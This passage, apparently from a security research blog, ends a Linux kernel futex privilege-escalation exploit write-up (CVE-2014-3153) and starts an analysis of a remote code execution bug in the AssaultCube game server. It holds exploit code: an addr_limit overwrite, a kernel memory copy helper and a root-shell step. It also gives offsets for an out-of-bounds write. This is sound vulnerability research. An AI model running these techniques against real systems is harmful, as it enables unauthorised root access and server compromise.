<span class="n">printf</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Main thread's cred @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">main_cred</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">COUNT_OF</span><span class="p">(</span><span class="n">main_cred</span><span class="o">-></span><span class="n">ids</span><span class="p">);</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="n">kmemcpy</span><span class="p">(</span><span class="o">&</span><span class="n">root_id</span><span class="p">,</span> <span class="o">&</span><span class="n">main_cred</span><span class="o">-></span><span class="n">ids</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">root_id</span><span class="p">));</span>
<span class="n">puts</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Escalated privileges to root successfully."</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">escalate_priv</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">pthread_t</span> <span class="n">addr_limit_writer</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sigaction</span> <span class="n">sigact</span> <span class="o">=</span> <span class="p">{.</span><span class="n">sa_handler</span> <span class="o">=</span> <span class="n">escalate_priv_sighandler</span><span class="p">};</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">sigaction</span><span class="p">(</span><span class="n">SIGINT</span><span class="p">,</span> <span class="o">&</span><span class="n">sigact</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">));</span>
<span class="n">puts</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Registered the privileges escalator signal handler for interrupting the corrupter thread."</span><span class="p">);</span>
<span class="n">fake_waiter</span><span class="p">.</span><span class="n">list_entry</span><span class="p">.</span><span class="n">prio_list</span><span class="p">.</span><span class="n">prev</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">corrupter_thread_info</span><span class="o">-></span><span class="n">addr_limit</span><span class="p">;</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">pthread_create</span><span class="p">(</span><span class="o">&</span><span class="n">addr_limit_writer</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">lock_pi_futex</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">));</span>
<span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="n">pthread_kill</span><span class="p">(</span><span class="n">corrupter</span><span class="p">,</span> <span class="n">SIGINT</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>After we’ve executed <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L138"><code class="language-plaintext highlighter-rouge">leak_thread_info()</code></a>, we’re going to call <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L123"><code class="language-plaintext highlighter-rouge">escalate_priv()</code></a>.
The first thing that it does is register <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L95"><code class="language-plaintext highlighter-rouge">escalate_priv_sighandler</code></a> as the <code class="language-plaintext highlighter-rouge">SIGINT</code> signal handler using the <a href="https://man7.org/linux/man-pages/man2/sigaction.2.html"><code class="language-plaintext highlighter-rouge">sigaction()</code></a> syscall.</p>
<p>Let’s briefly mention what signal handlers are and why we use them.
A signal handler is a function that is called by the target environment when the corresponding signal occurs.
The target environment <strong>suspends execution</strong> of the program until the signal handler returns.</p>
<p>This mechanism allows us to <strong>interrupt</strong> the process’ job in order to perform some other work.
In our case, we’d like to form the kernel stack in a certain way and also be able to execute a piece of code on the same thread.
However, in order to arrange the stack we have to perform a blocking operation because otherwise our arrangement would be overwritten,
but if you block you can’t exploit the stack’s state.</p>
<p>That’s why signals are needed and why they’re used in our scenario.
They allow us to execute code within the process’ context <strong>outside its normal execution flow</strong>.</p>
<p>Recall that with <code class="language-plaintext highlighter-rouge">pthreads</code>, all the signal handlers are shared with the parent process,
because internally <code class="language-plaintext highlighter-rouge">pthreads</code> passes both the <code class="language-plaintext highlighter-rouge">CLONE_THREAD | CLONE_SIGHAND</code> flags when it creates the new thread with <a href="https://man7.org/linux/man-pages/man2/clone.2.html"><code class="language-plaintext highlighter-rouge">clone()</code></a>.</p>
<blockquote>
<p>CLONE_THREAD<br />
The flags mask must also include CLONE_SIGHAND if CLONE_THREAD is specified.</p>
</blockquote>
<p>Afterwards, we place the address that we want to write to, that is <code class="language-plaintext highlighter-rouge">&corrupter_thread_info->addr_limit</code>, as the fake waiter’s previous node.
Once we attempt to lock the futex, the newly created waiter writes its own address to <code class="language-plaintext highlighter-rouge">addr_limit</code>.
This is not yet a value that we control,
but it is guaranteed to be bigger than the current one because <code class="language-plaintext highlighter-rouge">addr_limit</code> sits at the very bottom of the virtual address space.</p>
<p>Now we’ve arrived at a scenario where <code class="language-plaintext highlighter-rouge">addr_limit > &addr_limit</code> is surely true.
Once this condition is met, we can simply write to <code class="language-plaintext highlighter-rouge">addr_limit</code> once again on our own!
This is where the signaling comes into play, and specifically the <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L95"><code class="language-plaintext highlighter-rouge">escalate_priv_sighandler</code></a> from earlier.</p>
<p>Because each thread has its own <a href="https://elixir.bootlin.com/linux/v3.11.4/source/arch/x86/include/asm/thread_info.h#L25"><code class="language-plaintext highlighter-rouge">thread_info</code></a>, which in turn means that each thread also has its own <code class="language-plaintext highlighter-rouge">addr_limit</code>,
we’d need a way to interrupt the <em>specific</em> thread whose <code class="language-plaintext highlighter-rouge">addr_limit</code> we’ve overwritten.
After we’ve “increased” the address limit, only that thread is able to take advantage of it.
This is where we signal the <code class="language-plaintext highlighter-rouge">corrupter</code> thread using <code class="language-plaintext highlighter-rouge">pthread_kill()</code>, which triggers the execution of <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L95"><code class="language-plaintext highlighter-rouge">escalate_priv_sighandler</code></a> on that thread.</p>
<p>What this function does is read and write to different areas in kernel memory.
In order to do it, I wrote a small helper function called <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c#L40"><code class="language-plaintext highlighter-rouge">kmemcpy()</code></a>.
It exploits the fact that <code class="language-plaintext highlighter-rouge">addr_limit</code> has been overwritten: it creates a pipe, writes the source buffer into it, and reads it back out into the destination.
The <code class="language-plaintext highlighter-rouge">write()</code> and <code class="language-plaintext highlighter-rouge">read()</code> syscalls internally invoke <code class="language-plaintext highlighter-rouge">copy_from_user()</code> and <code class="language-plaintext highlighter-rouge">copy_to_user()</code> respectively within the kernel, which do the checks according to <code class="language-plaintext highlighter-rouge">addr_limit</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">unsigned</span> <span class="kt">long</span>
<span class="nf">_copy_from_user</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">to</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">from</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">n</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">access_ok</span><span class="p">(</span><span class="n">VERIFY_READ</span><span class="p">,</span> <span class="n">from</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span> <span class="c1">// <-- addr_limit comparison</span>
<span class="n">n</span> <span class="o">=</span> <span class="n">__copy_from_user</span><span class="p">(</span><span class="n">to</span><span class="p">,</span> <span class="n">from</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
<span class="k">else</span>
<span class="n">memset</span><span class="p">(</span><span class="n">to</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
<span class="k">return</span> <span class="n">n</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">unsigned</span> <span class="kt">long</span>
<span class="nf">copy_to_user</span><span class="p">(</span><span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">to</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">from</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">n</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">access_ok</span><span class="p">(</span><span class="n">VERIFY_WRITE</span><span class="p">,</span> <span class="n">to</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span> <span class="c1">// <-- addr_limit comparison</span>
<span class="n">n</span> <span class="o">=</span> <span class="n">__copy_to_user</span><span class="p">(</span><span class="n">to</span><span class="p">,</span> <span class="n">from</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
<span class="k">return</span> <span class="n">n</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">#define access_ok(type, addr, size) \
(likely(__range_not_ok(addr, size, user_addr_max()) == 0))
</span>
<span class="cp">#define user_addr_max() (current_thread_info()->addr_limit.seg)
</span></code></pre></div></div>
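<p>The pipe trick itself is easy to try on ordinary userspace memory. Below is a hedged variant of the helper: <code class="language-plaintext highlighter-rouge">pipe_copy()</code> is a hypothetical name, it returns an error instead of asserting, and it closes the pipe when done. On an unmodified thread it can of course only touch userspace buffers, since the kernel’s checks reject anything else.</p>

```c
#include <stdbool.h>
#include <stddef.h>
#include <unistd.h>

/* Copy len bytes from src to dst by bouncing them through a pipe.
 * len must fit in the pipe's buffer, otherwise write() would block. */
static bool pipe_copy(const void *src, void *dst, size_t len)
{
    int pipefd[2];
    bool ok;

    if (pipe(pipefd) != 0)
        return false;

    /* write(): the kernel copies from src; read(): the kernel copies to dst. */
    ok = write(pipefd[1], src, len) == (ssize_t)len &&
         read(pipefd[0], dst, len) == (ssize_t)len;

    close(pipefd[0]);
    close(pipefd[1]);
    return ok;
}
```

<p>The point of going through syscalls is that the kernel performs both copies on our behalf, so whatever the current <code class="language-plaintext highlighter-rouge">addr_limit</code> allows is what we can reach.</p>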
<p>The signal handler performs several operations:</p>
<ol>
<li>Cancel the address space access limitation by setting <code class="language-plaintext highlighter-rouge">addr_limit</code> to the highest value possible.</li>
<li>Read the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a> pointer of the corrupted thread.</li>
<li>Read the parent’s <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a> pointer from the corrupted thread’s <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a> via the <code class="language-plaintext highlighter-rouge">group_leader</code> member which points to it.</li>
<li>Read the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/cred.h#L102"><code class="language-plaintext highlighter-rouge">cred</code></a> struct pointer from the parent’s <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a>.</li>
<li>Overwrite all the identifiers (uid, gid, suid, sgid, etc.) of the main <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/cred.h#L102"><code class="language-plaintext highlighter-rouge">cred</code></a> struct.</li>
</ol>
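<p>The steps above boil down to a short pointer chase. Here’s a userspace mock of it with made-up structures that only carry the fields we follow; the <code class="language-plaintext highlighter-rouge">mock_*</code> names are hypothetical, and the count of eight identifiers is my assumption about the layout of <code class="language-plaintext highlighter-rouge">cred</code>. In the real exploit every dereference is a <code class="language-plaintext highlighter-rouge">kmemcpy()</code> call rather than a plain memory access.</p>

```c
#include <stddef.h>

/* Assumption: uid, gid, suid, sgid, euid, egid, fsuid, fsgid. */
#define NUM_IDS 8

/* Mock structures holding only the members used by the chase. */
struct mock_cred {
    unsigned int ids[NUM_IDS];
};

struct mock_task {
    struct mock_task *group_leader; /* main thread of the process */
    struct mock_cred *cred;
};

struct mock_thread_info {
    struct mock_task *task;
    unsigned long addr_limit;
};

static void mock_escalate(struct mock_thread_info *ti)
{
    struct mock_task *thread_task, *main_task;
    struct mock_cred *main_cred;
    size_t i;

    ti->addr_limit = (unsigned long)-1;    /* 1. lift the address limit    */
    thread_task = ti->task;                /* 2. corrupted thread's task   */
    main_task = thread_task->group_leader; /* 3. main thread's task        */
    main_cred = main_task->cred;           /* 4. main thread's credentials */

    for (i = 0; i < NUM_IDS; i++)          /* 5. every identifier -> root  */
        main_cred->ids[i] = 0;
}
```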
<h1 id="popping-shell">Popping Shell</h1>
<p>Now all that’s left to do is <code class="language-plaintext highlighter-rouge">system("/bin/sh")</code> on the main thread to drop a shell.<br />
Because the child process inherits the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/cred.h#L102"><code class="language-plaintext highlighter-rouge">cred</code></a> struct, the shell will also run with <code class="language-plaintext highlighter-rouge">root</code> permissions.</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/L2pUKvGZtSw" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe></center>
<h1 id="concluding">Concluding</h1>
<p>This has been a lot of fun, and I’ve learned so much on the way.<br />
I got to have the interaction I desired with the kernel, working with it and understanding how it works a bit better.
Needless to say, there’s an infinite amount of knowledge left to gather, but this is a small step forward.
At the end, the <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c">exploit</a> seems relatively short, but the truly important part is getting there and being able to solve the puzzle.</p>
<p>The full repository can be found <a href="https://github.com/elongl/CVE-2014-3153">here</a>.</p>
<p>If you have any questions, feel free to contact me and I’ll gladly answer.<br />
Hope you enjoyed the read. Thanks!</p>
<p>Special thanks to Nspace who helped throughout the process.</p>
<h1>AssaultCube RCE: Technical Analysis</h1>
<p>Published 2020-10-18 at <a href="https://elongl.github.io/exploitation/2020/10/18/assaultcube-rce-technical-analysis">https://elongl.github.io/exploitation/2020/10/18/assaultcube-rce-technical-analysis</a></p>
<p>(Also available on <a href="https://medium.com/@elongl/assaultcube-rce-technical-analysis-e12dedf680e5">Medium</a>)</p>
<p>So I’ve been doing quite a lot of Wargames & CTFs and I was looking to research a “real” production application.</p>
<p>I decided to go with a game called <strong>AssaultCube</strong>.</p>
<p>The game is open-source and is still very active with quite a lot of players and servers still running, so I thought “that might be an interesting target”.</p>
<p><img src="https://cdn-images-1.medium.com/max/2400/0*Ocxqa-cjkiRh9LJ9.png" alt="(Cube Engine)" /></p>
<h2 id="defining-goals">Defining Goals</h2>
<p>The goal was clear and straightforward, achieving <strong>Remote Code Execution Client → Server</strong>.</p>
<p>Client → client and server → client are also possible, but they both <em>tend</em> to be easier as the client is usually written to trust its input more.
Escalating to admin, crashing the server, or writing some hacks (which <a href="https://github.com/elongl/assaultcube-aimbot-external">I did</a> by the way) were <strong>not</strong> what I was looking for.</p>
<h2 id="starting-out">Starting Out</h2>
<p>So I opened up the game’s code and started to get familiar with the codebase.
Right from the beginning I was looking for the code that takes input from the client and looked for ways to meddle with it, essentially providing unexpected data to the server.
Pretty quickly I came across the <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2638">process</a> function in <code class="language-plaintext highlighter-rouge">server.cpp</code>.</p>
<p>This is the function that, according to the developers, does <em>“server-side processing of updates”</em>.<br />
Looks like a good place to start.</p>
<p>So I started going over the various updates that can be sent from the client, for instance, sending a text message or the player’s position on the map. I quickly noticed that reading data from the client is done using functions like <code class="language-plaintext highlighter-rouge">getstring</code> and <code class="language-plaintext highlighter-rouge">getint</code>, etc.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Sending a text message to other clients.</span>
<span class="k">case</span> <span class="n">SV_TEXT</span><span class="p">:</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">getstring</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span> <span class="c1">// Read input.</span>
<span class="n">filtertext</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">text</span><span class="p">);</span> <span class="c1">// Filter printable characters.</span>
<span class="n">trimtrailingwhitespace</span><span class="p">(</span><span class="n">text</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>According to my initial instincts, I started looking for simple “dumb” overflows with strings but they’ve wrapped it safely and I couldn’t find any of those (that would’ve been too easy). So I just kept reading the source and <em>recursively</em> looking into where the data I’m providing is being processed.</p>
<p>Then…
I came across <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2988">this</a>.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">enum</span>
<span class="p">{</span>
<span class="n">GUN_KNIFE</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
<span class="n">GUN_PISTOL</span><span class="p">,</span>
<span class="n">GUN_CARBINE</span><span class="p">,</span>
<span class="n">GUN_SHOTGUN</span><span class="p">,</span>
<span class="n">GUN_SUBGUN</span><span class="p">,</span>
<span class="n">GUN_SNIPER</span><span class="p">,</span>
<span class="n">GUN_ASSAULT</span><span class="p">,</span>
<span class="n">GUN_CPISTOL</span><span class="p">,</span>
<span class="n">GUN_GRENADE</span><span class="p">,</span>
<span class="n">GUN_AKIMBO</span><span class="p">,</span>
<span class="n">NUMGUNS</span> <span class="c1">// Equals 10</span>
<span class="p">};</span>
<span class="p">...</span>
<span class="k">case</span> <span class="n">SV_PRIMARYWEAP</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">nextprimary</span> <span class="o">=</span> <span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">nextprimary</span> <span class="o"><</span> <span class="mi">0</span> <span class="o">&&</span> <span class="n">nextprimary</span> <span class="o">>=</span> <span class="n">NUMGUNS</span><span class="p">)</span>
<span class="k">break</span><span class="p">;</span>
<span class="n">cl</span><span class="o">-></span><span class="n">state</span><span class="p">.</span><span class="n">nextprimary</span> <span class="o">=</span> <span class="n">nextprimary</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">...</span>
</code></pre></div></div>
<p>If you haven’t spotted the “problem” yet, take a second and look again.<br />
Let me preprocess that for you: <code class="language-plaintext highlighter-rouge">if (nextprimary < 0 && nextprimary >= 10)</code></p>
<p>There isn’t any integer that is both smaller than 0 and greater than or equal to 10.<br />
That means that no matter which <code class="language-plaintext highlighter-rouge">nextprimary</code> the client sends,<br />
it’ll be stored in <code class="language-plaintext highlighter-rouge">cl->state.nextprimary</code>, since the condition can never be true.
That could’ve easily been caught with <code class="language-plaintext highlighter-rouge">-Wunreachable-code</code>, but unfortunately that’s not included in <code class="language-plaintext highlighter-rouge">-Wall</code>, which is the warning option in the project’s Makefile.</p>
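<p>To make the logic error concrete, here is a minimal Python sketch of the same predicate. The function names are mine, not from the AssaultCube source, and the "intended" version is only my assumption about what the check was meant to be.</p>

```python
NUMGUNS = 10  # value of the enum's last member in the snippet above


def rejected_as_written(nextprimary: int) -> bool:
    """Mirror of the server's check: `< 0 && >= NUMGUNS`."""
    return nextprimary < 0 and nextprimary >= NUMGUNS


def rejected_as_intended(nextprimary: int) -> bool:
    """Presumed intent (an assumption): `< 0 || >= NUMGUNS`."""
    return nextprimary < 0 or nextprimary >= NUMGUNS


candidates = range(-1000, 1000)
# No candidate is ever rejected by the check as written.
never_rejected = not any(rejected_as_written(n) for n in candidates)
# The presumed-intended check accepts exactly the valid weapon IDs 0..9.
accepted = [n for n in candidates if not rejected_as_intended(n)]
```

<p>With <code class="language-plaintext highlighter-rouge">and</code> the rejection branch is dead code, so every value a client sends passes through.</p>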
<p>At that point, I immediately started looking for references to
<code class="language-plaintext highlighter-rouge">cl->state.nextprimary</code> to see what I could do with this bug.</p>
<p>A lot of the references seemed to be useless in terms of exploitation, but then I noticed the function that changed everything — <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/entity.h#L334">spawnstate</a>.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">virtual</span> <span class="kt">void</span> <span class="nf">spawnstate</span><span class="p">(</span><span class="kt">int</span> <span class="n">gamemode</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">m_pistol</span><span class="p">)</span>
<span class="n">primary</span> <span class="o">=</span> <span class="n">GUN_PISTOL</span><span class="p">;</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">m_osok</span><span class="p">)</span>
<span class="n">primary</span> <span class="o">=</span> <span class="n">GUN_SNIPER</span><span class="p">;</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">m_lss</span><span class="p">)</span>
<span class="n">primary</span> <span class="o">=</span> <span class="n">GUN_KNIFE</span><span class="p">;</span>
<span class="k">else</span>
<span class="n">primary</span> <span class="o">=</span> <span class="n">nextprimary</span><span class="p">;</span>
<span class="p">...</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">m_noprimary</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">ammo</span><span class="p">[</span><span class="n">primary</span><span class="p">]</span> <span class="o">=</span> <span class="n">ammostats</span><span class="p">[</span><span class="n">primary</span><span class="p">].</span><span class="n">start</span> <span class="o">-</span> <span class="n">magsize</span><span class="p">(</span><span class="n">primary</span><span class="p">);</span>
<span class="n">mag</span><span class="p">[</span><span class="n">primary</span><span class="p">]</span> <span class="o">=</span> <span class="n">magsize</span><span class="p">(</span><span class="n">primary</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">...</span>
</code></pre></div></div>
<p>The function enables me to write a <em>somewhat</em> random integer (I cannot control the value being assigned) into memory at an index of my choosing relative to the <code class="language-plaintext highlighter-rouge">mag</code> and <code class="language-plaintext highlighter-rouge">ammo</code> arrays. These are members of the <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.h#L109">clientstate</a> struct, which is located within the much bigger <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.h#L226">client</a> struct.</p>
<p>I <a href="https://github.com/elongl/AC/commit/dc7b06208542de782e3703c3f8a9a0b8be254f5e">patched</a> the client’s code to send an unexpected integer (non-existent weapon ID), expecting it to cause the server to crash, essentially getting a segmentation fault.</p>
<p>And what do you know…</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/pQDS4FrSiNA" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe></center>
<p>The server has crashed and all clients were immediately disconnected.<br />
At this point I can just halt and ruin the game for other players.<br />
<em>(Don’t do that)</em></p>
<p>By the way, oddly enough, I later noticed that there is no input validation at the <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2666">introduction</a> of the client either, so I could’ve done it there as well.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">copystring</span><span class="p">(</span><span class="n">cl</span><span class="o">-></span><span class="n">name</span><span class="p">,</span> <span class="n">text</span><span class="p">,</span> <span class="n">MAXNAMELEN</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">getstring</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>
<span class="n">copystring</span><span class="p">(</span><span class="n">cl</span><span class="o">-></span><span class="n">pwd</span><span class="p">,</span> <span class="n">text</span><span class="p">);</span>
<span class="n">getstring</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>
<span class="n">filterlang</span><span class="p">(</span><span class="n">cl</span><span class="o">-></span><span class="n">lang</span><span class="p">,</span> <span class="n">text</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">wantrole</span> <span class="o">=</span> <span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
<span class="n">cl</span><span class="o">-></span><span class="n">state</span><span class="p">.</span><span class="n">nextprimary</span> <span class="o">=</span> <span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
<span class="n">loopi</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="n">cl</span><span class="o">-></span><span class="n">skin</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<h2 id="what-now">What now?</h2>
<p>Crashing the server is nice and all, but how can we actually escalate that into something more interesting?</p>
<p>My intuition was to look for members of the <code class="language-plaintext highlighter-rouge">client</code> struct where an unexpected integer write would disrupt the game’s normal flow.
At first, I couldn’t find any, given how severe the limitations are (no control over what gets written), so I mostly looked for booleans or values where a <em>sudden, out of the ordinary</em> change would make a difference.</p>
<p>I started iterating over the members of the <code class="language-plaintext highlighter-rouge">client</code> struct to look for places to write a random integer into, and I saw that there are <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.h#L251">a few</a> <code class="language-plaintext highlighter-rouge">vector</code> structs.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="nc">client</span> <span class="p">{</span>
<span class="p">...</span>
<span class="n">clientstate</span> <span class="n">state</span><span class="p">;</span>
<span class="n">vector</span><span class="o"><</span><span class="n">gameevent</span><span class="o">></span> <span class="n">events</span><span class="p">;</span>
<span class="n">vector</span><span class="o"><</span><span class="n">uchar</span><span class="o">></span> <span class="n">position</span><span class="p">,</span> <span class="n">messages</span><span class="p">;</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Perhaps overwriting the capacity member of a vector would open up an overflow, by making the vector think it’s bigger than it really is!</p>
<p>I opened up the <code class="language-plaintext highlighter-rouge">vector</code> definition to see how it’s <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/tools.h#L375">built</a> and after a little reading I quickly picked up that:</p>
<p><code class="language-plaintext highlighter-rouge">ulen</code> — Used Length, amount of elements within the vector.<br />
<code class="language-plaintext highlighter-rouge">alen</code> — Available Length, how many elements the vector can hold.<br />
<code class="language-plaintext highlighter-rouge">buf</code> — A pointer to the buffer itself.</p>
<p>Corrupting the <code class="language-plaintext highlighter-rouge">alen</code> of one of the vectors was tempting :)</p>
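<p>Why would a corrupted <code class="language-plaintext highlighter-rouge">alen</code> matter? Here is a toy Python model of the idea. It is not the AssaultCube implementation: I am assuming, as is common for hand-rolled vectors, that adding an element only reallocates once <code class="language-plaintext highlighter-rouge">ulen</code> reaches <code class="language-plaintext highlighter-rouge">alen</code>. The shared <code class="language-plaintext highlighter-rouge">heap</code> and the neighbouring object are made up for illustration.</p>

```python
class ToyVector:
    """Toy model of a growable buffer tracked by ulen/alen.

    Assumption: add() only reallocates when ulen reaches alen.
    """

    def __init__(self, heap: bytearray, start: int, capacity: int):
        self.heap = heap      # shared "heap" that also holds neighbours
        self.start = start    # offset of our buffer inside the heap
        self.alen = capacity  # how many bytes the vector believes it owns
        self.ulen = 0         # how many bytes are in use

    def add(self, byte: int) -> None:
        if self.ulen == self.alen:
            # A real vector would reallocate here; the toy just stops.
            raise MemoryError("would reallocate here")
        self.heap[self.start + self.ulen] = byte
        self.ulen += 1


heap = bytearray(64)
heap[32:40] = b"NEIGHBOR"            # an unrelated object right after our buffer
vec = ToyVector(heap, start=0, capacity=32)

vec.alen = 0x7FFFFFFF                # simulate the stray write landing on alen
for byte in b"A" * 36:               # 4 bytes more than the real capacity
    vec.add(byte)

clobbered = bytes(heap[32:40])       # the neighbour now starts with our bytes
```

<p>Once <code class="language-plaintext highlighter-rouge">alen</code> is larger than the real allocation, the growth check never fires and writes spill into whatever sits next on the heap.</p>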
<p>I chose <code class="language-plaintext highlighter-rouge">messages</code> over the others because it is the one I can write my own data into, which makes it the ideal vector to overflow.
We’ll see that in a bit.</p>
<p>I calculated the offsets:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg> p &client.messages.alen
$10 = (int *) 0x17ca990
pwndbg> down
► f 0 42c560 playerstate::spawnstate(int)
f 1 411b32 sendspawn(client*)+258
f 2 41f93f
f 3 424d46
f 4 42620a
f 5 426289 main+89
f 6 7f3b7e0cc0b3 __libc_start_main+243
pwndbg> p &this->mag
$11 = (int (*)[10]) 0x17ca848
pwndbg> p (0x17ca990 - 0x17ca848) / 4
$14 = 0x52
// 0x52 is the index (in 4-byte ints) from client.state.mag to client.messages.alen
// &client.state.mag[0x52] == &client.messages.alen
</code></pre></div></div>
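<p>The same arithmetic, spelled out as a small Python sketch. The two addresses are copied from the debugging session above; they belong to that particular run, and only their difference matters. The variable names are mine.</p>

```python
INT_SIZE = 4  # sizeof(int) on the target, matching the `/ 4` in the gdb session

mag_addr = 0x17CA848    # &this->mag, from the session above
alen_addr = 0x17CA990   # &client.messages.alen, from the session above

byte_distance = alen_addr - mag_addr
index, remainder = divmod(byte_distance, INT_SIZE)

# mag[index] aliases messages.alen only if the distance is int-aligned.
aligned = remainder == 0
```

<p>The distance is <code class="language-plaintext highlighter-rouge">0x148</code> bytes, which is exactly <code class="language-plaintext highlighter-rouge">0x52</code> ints, so that is the "weapon ID" to send.</p>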
<p>I supplied <code class="language-plaintext highlighter-rouge">0x52</code> as the weapon ID and hoped that a big integer would be written into <code class="language-plaintext highlighter-rouge">alen</code> and luckily enough…</p>
